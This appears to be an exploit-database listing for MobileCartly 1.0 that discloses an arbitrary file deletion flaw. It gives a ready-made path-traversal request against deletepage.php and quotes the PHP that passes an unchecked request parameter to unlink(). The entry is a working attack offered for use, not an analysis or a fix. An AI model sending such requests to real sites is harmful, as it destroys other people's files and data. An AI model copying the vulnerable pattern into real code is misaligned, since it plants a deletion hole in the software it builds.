MobileCartly 1.0 - Arbitrary File Deletion
| EKU-ID: 25957 | CVE: OSVDB-85137 | OSVDB-ID: |
| Author: GoLd_M | Published: 2012-08-10 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 25957 | CVE: OSVDB-85137 | OSVDB-ID: |
| Author: GoLd_M | Published: 2012-08-10 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
# Exploit Title: MobileCartly 1.0 <= Arbitrary Delete Vulnerability # Date: 09/08/2012 # Author: GoLd_M # Vendor or Software Link: http://mobilecartly.com/mobilecartly.zip # Version: 1.0 # Category:: Arbitrary Delete Vulnerability # Google dork: :( # Tested on: Xp SP 2 # Ex : [MobileCartly 1.0]/includes/deletepage.php?deletepage=../[File] # Code Page /includes/deletepage.php # <? # # $page = "../pages/" . $_REQUEST['deletepage']; <<---XXX # # unlink($page); <<---XXX[Booooom] # # # ?>